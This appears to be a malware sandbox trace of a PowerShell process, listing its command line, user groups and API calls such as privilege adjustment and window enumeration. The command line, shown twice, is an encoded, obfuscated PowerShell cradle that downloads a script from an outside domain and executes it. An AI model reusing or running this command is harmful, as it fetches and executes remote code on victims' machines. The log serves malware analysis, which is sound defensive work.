	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 227
	os_tid = 0xca4


Thread:
	id = 281
	os_tid = 0xe00


Thread:
	id = 285
	os_tid = 0xe20


Thread:
	id = 1819
	os_tid = 0x1a48


Thread:
	id = 1828
	os_tid = 0x2404


Thread:
	id = 1839
	os_tid = 0x2438


Thread:
	id = 1989
	os_tid = 0x26fc


Process:
	id = "42"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2066000"
	os_pid = "0xcd4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 236
	os_tid = 0xcd8

	[0460.187] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0461.680] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0461.681] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0461.681] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0461.681] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0467.276] GetVersionExW (in: lpVersionInformation=0x1ed920*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed920*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0467.278] GetVersionExW (in: lpVersionInformation=0x1ed920*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed920*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0467.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0467.790] GetVersionExW (in: lpVersionInformation=0x1ed690*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed690*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0467.790] SetErrorMode (uMode=0x1) returned 0x1
	[0467.791] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ed7f0 | out: lpFileInformation=0x1ed7f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0467.792] SetErrorMode (uMode=0x1) returned 0x1
	[0467.795] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1eda60 | out: lpdwHandle=0x1eda60) returned 0x94c
	[0467.796] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c172d8 | out: lpData=0x2c172d8) returned 1
	[0467.798] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed9d8, puLen=0x1ed9d0 | out: lplpBuffer=0x1ed9d8*=0x2c17374, puLen=0x1ed9d0) returned 1
	[0467.801] lstrlenW (lpString="䅁") returned 1
	[0467.810] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2c17450, puLen=0x1ed940) returned 1
	[0467.811] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0467.813] CoTaskMemAlloc (cb=0x2e) returned 0x3d69d0
	[0467.813] lstrcpyW (in: lpString1=0x3d69d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0467.814] CoTaskMemFree (pv=0x3d69d0) 
	[0467.814] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2c174a4, puLen=0x1ed940) returned 1
	[0467.815] lstrlenW (lpString="System.Management.Automation") returned 28
	[0467.815] CoTaskMemAlloc (cb=0x3c) returned 0x319860
	[0467.815] lstrcpyW (in: lpString1=0x319860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0467.815] CoTaskMemFree (pv=0x319860) 
	[0467.815] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2c17500, puLen=0x1ed940) returned 1
	[0467.815] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0467.815] CoTaskMemAlloc (cb=0x20) returned 0x3d6f10
	[0467.815] lstrcpyW (in: lpString1=0x3d6f10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0467.815] CoTaskMemFree (pv=0x3d6f10) 
	[0467.815] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2c17540, puLen=0x1ed940) returned 1
	[0467.815] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0467.815] CoTaskMemAlloc (cb=0x44) returned 0x319860
	[0467.815] lstrcpyW (in: lpString1=0x319860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0467.815] CoTaskMemFree (pv=0x319860) 
	[0467.815] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2c175a8, puLen=0x1ed940) returned 1
	[0467.815] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0467.815] CoTaskMemAlloc (cb=0x76) returned 0x381160
	[0467.815] lstrcpyW (in: lpString1=0x381160, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0467.815] CoTaskMemFree (pv=0x381160) 
	[0467.815] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2c17644, puLen=0x1ed940) returned 1
	[0467.815] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0467.815] CoTaskMemAlloc (cb=0x44) returned 0x319860
	[0467.815] lstrcpyW (in: lpString1=0x319860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0467.815] CoTaskMemFree (pv=0x319860) 
	[0467.815] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2c176a8, puLen=0x1ed940) returned 1
	[0467.815] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0467.815] CoTaskMemAlloc (cb=0x58) returned 0x338730
	[0467.815] lstrcpyW (in: lpString1=0x338730, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0467.815] CoTaskMemFree (pv=0x338730) 
	[0467.816] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2c17724, puLen=0x1ed940) returned 1
	[0467.816] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0467.816] CoTaskMemAlloc (cb=0x20) returned 0x3d6f10
	[0467.816] lstrcpyW (in: lpString1=0x3d6f10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0467.816] CoTaskMemFree (pv=0x3d6f10) 
	[0467.816] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x2c173cc, puLen=0x1ed940) returned 1
	[0467.816] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0467.816] CoTaskMemAlloc (cb=0x66) returned 0x35c1a0
	[0467.816] lstrcpyW (in: lpString1=0x35c1a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0468.243] CoTaskMemFree (pv=0x35c1a0) 
	[0468.243] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x0, puLen=0x1ed940) returned 0
	[0468.243] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x0, puLen=0x1ed940) returned 0
	[0468.243] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ed948, puLen=0x1ed940 | out: lplpBuffer=0x1ed948*=0x0, puLen=0x1ed940) returned 0
	[0468.243] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ed918, puLen=0x1ed910 | out: lplpBuffer=0x1ed918*=0x2c17374, puLen=0x1ed910) returned 1
	[0468.244] CoTaskMemAlloc (cb=0x204) returned 0x383af0
	[0468.244] VerLanguageNameW (in: wLang=0x0, szLang=0x383af0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0468.246] CoTaskMemFree (pv=0x383af0) 
	[0468.246] VerQueryValueW (in: pBlock=0x2c172d8, lpSubBlock="\\", lplpBuffer=0x1ed968, puLen=0x1ed960 | out: lplpBuffer=0x1ed968*=0x2c17300, puLen=0x1ed960) returned 1
	[0468.252] GetCurrentProcessId () returned 0xcd4
	[0468.268] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ec890 | out: lpLuid=0x1ec890*(LowPart=0x14, HighPart=0)) returned 1
	[0468.270] GetCurrentProcess () returned 0xffffffffffffffff
	[0468.271] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ec8b0 | out: TokenHandle=0x1ec8b0*=0x2e4) returned 1
	[0468.272] AdjustTokenPrivileges (in: TokenHandle=0x2e4, DisableAllPrivileges=0, NewState=0x2c1ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0468.273] CloseHandle (hObject=0x2e4) returned 1
	[0468.277] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xcd4) returned 0x2e4
	[0468.820] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2c1abb8, cb=0x200, lpcbNeeded=0x1ed8c8 | out: lphModule=0x2c1abb8, lpcbNeeded=0x1ed8c8) returned 1
	[0468.822] GetModuleInformation (in: hProcess=0x2e4, hModule=0x13f370000, lpmodinfo=0x2c1ae28, cb=0x18 | out: lpmodinfo=0x2c1ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0468.823] CoTaskMemAlloc (cb=0x804) returned 0x3e08c0
	[0468.823] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x13f370000, lpBaseName=0x3e08c0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0468.824] CoTaskMemFree (pv=0x3e08c0) 
	[0468.824] CoTaskMemAlloc (cb=0x804) returned 0x3e08c0
	[0468.824] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x13f370000, lpFilename=0x3e08c0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0468.825] CoTaskMemFree (pv=0x3e08c0) 
	[0468.825] CloseHandle (hObject=0x2e4) returned 1
	[0468.834] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xcd4) returned 0x2e4
	[0468.835] GetExitCodeProcess (in: hProcess=0x2e4, lpExitCode=0x1ed9f8 | out: lpExitCode=0x1ed9f8*=0x103) returned 1
	[0468.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c1b088, Length=0x20000, ResultLength=0x1ed9c0 | out: SystemInformation=0x12c1b088, ResultLength=0x1ed9c0*=0x2ca90) returned 0xc0000004
	[0468.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c3b0b8, Length=0x2f290, ResultLength=0x1ed9c0 | out: SystemInformation=0x12c3b0b8, ResultLength=0x1ed9c0*=0x2ca90) returned 0x0
	[0468.859] EnumWindows (lpEnumFunc=0x2b966ac, lParam=0x0) returned 1
	[0471.280] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.280] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x558
	[0471.280] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.280] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.280] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.281] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x538
	[0471.281] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.281] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x778
	[0471.281] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x778
	[0471.281] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.281] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.281] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.281] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.281] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.281] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.281] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.282] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.282] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x460
	[0471.282] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.282] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x4d0
	[0471.282] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1694
	[0471.282] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1770
	[0471.282] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1720
	[0471.282] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x165c
	[0471.282] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1578
	[0471.282] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x16c0
	[0471.282] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x161c
	[0471.283] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1638
	[0471.283] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x15c8
	[0471.283] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1554
	[0471.283] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1674
	[0471.283] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1520
	[0471.283] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x14bc
	[0471.283] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xf8c
	[0471.283] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe9c
	[0471.283] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1434
	[0471.283] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x14ec
	[0471.283] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xfcc
	[0471.284] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x12ac
	[0471.284] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1484
	[0471.284] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x934
	[0471.284] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc0c
	[0471.284] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xb08
	[0471.284] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x948
	[0471.284] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1178
	[0471.284] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x13e0
	[0471.284] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xcd0
	[0471.284] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x13fc
	[0471.284] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xdc8
	[0471.285] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc18
	[0471.285] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xc2c
	[0471.285] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xa1c
	[0471.285] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1244
	[0471.285] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xdb0
	[0471.285] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1398
	[0471.285] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1358
	[0471.285] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1370
	[0471.285] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1340
	[0471.285] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x130c
	[0471.286] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x12c0
	[0471.286] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x12e4
	[0471.286] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1270
	[0471.286] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1298
	[0471.286] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x120c
	[0471.286] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x122c
	[0471.286] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x11c4
	[0471.286] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x11b0
	[0471.286] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1188
	[0471.286] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1148
	[0471.286] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x1160
	[0471.287] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0x10fc
	[0471.287] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1ed720 | out: lpdwProcessId=0x1ed720) returned 0xe34
